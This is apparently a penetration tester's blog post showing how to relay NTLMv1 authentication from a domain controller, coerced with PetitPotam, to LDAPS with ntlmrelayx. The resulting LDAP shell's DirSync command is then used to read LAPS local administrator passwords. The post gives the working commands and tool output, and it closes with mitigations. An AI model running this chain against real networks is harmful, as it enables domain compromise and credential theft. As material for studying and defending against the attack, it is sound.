Defeat LAPS with NTLMv1-Relay

In our internal pentests, relay attacks that use the NTLMv1 protocol are still successful (unfortunately). Many older systems cannot be converted to better methods such as Kerberos, so a large number of attacks against NTLMv1 are still possible.

The two most common attacks are explained on the following blog entry: https://www.trustedsec.com/blog/practical-attacks-against-ntlmv1/

In our scenario we assume, that other methods are not working correctly and LAPS is used on the domain. Also we will not discuss cracking the hash with hashcat or crack.sh.

The attack works in many corporate networks, since almost all of the prerequisites are default settings or common:

• two domain controllers (with Windows Server 2012 functional level)
• no active LDAP signing (default)
• NTLMv1 activated on DC (often found)
• one of the domain controllers must reach the attacker system via port 445 (SMB) (often possible)
• one of the domain controllers must authenticate to the attacker system via PetitPotam, PrinterNightmare, Coercer etc. (rarely that all fixes and workarounds are implemented)
• NTLM authentication should be globally active (default)
• LAPS enabled (fortunately already implemented in many infrastructures)

Outline of the attack (created with https://whimsical.com) — Love this tool

1. Trigger SMB connection and NTLM authentication via PetitPotam

ntlmrelayx.py -t ldaps://dc2.domain.local — remove-mic -smb2support -i

python PetitPotam.py -pipe all LOCAL-IP dc1.domain.local

GitHub - topotam/PetitPotam: PoC tool to coerce Windows hosts to authenticate to other machines via…

GitHub - SecureAuthCorp/impacket: Impacket is a collection of Python classes for working with…

2. Authenticate via SMB with DC1$, relay the session and use the LDAP shell

[*] SMBD-Thread-5 (process_request_thread): Received connection from x.x.x.x, attacking target ldaps://dc2.domain.local

3. Relay the authentication to LDAPS and receive an interactive LDAP shell as DC1$

[*] Authenticating against ldaps://dc2.domain.local as DOMAIN/DC1$ SUCCEED
[*] Started interactive Ldap shell via TCP on 127.0.0.1:11000

Connect to LDAP shell using ncat

ncat 127.0.0.1 11000

4. Obtain LAPS password via DirSync method

To read the LAPS password (ms-Mcs-AdmPwd), special permissions are required, which the computer object of the domain controller usually does not have. Thus, the native LDAP shell function “get_laps_password” cannot be used directly. A DCSYNC cannot be executed with this session, since this is not performed exclusively via the LDAP protocol and also requires a signed session, which is not guaranteed by the preceding relay attack.

A remedy here can be the “DirSync” function, which allows targeted synchronization of objects via LDAP.

DirSync: Leveraging Replication Get-Changes and Get-Changes-In-Filtered-Set

This functionality has been implemented (as of 10/13/2022) via a still open PR in the “impacket” toolkit.

Add ldapshell dirsync/whoami by nurfed1 · Pull Request #1424 · SecureAuthCorp/impacket

After updating the file “ldap_shell.py” according to the referenced code, the LAPS password of the computer named “COMPUTER123$” can be obtained using the following command:

dirsync “(sAMAccountName=COMPUTER123$)” “ms-Mcs-AdmPwd”

Mitigations

The attack can be effectively stopped in several ways.

1. Firewall layer (network segmentation): Blocking connections via port 445 from any domain controller outbound to any client network
2. Global disabling of NTLM or disable NTLMv1

More information on NTLMv1

Practical Attacks against NTLMv1 - TrustedSec

Thanks for reading. Cheers.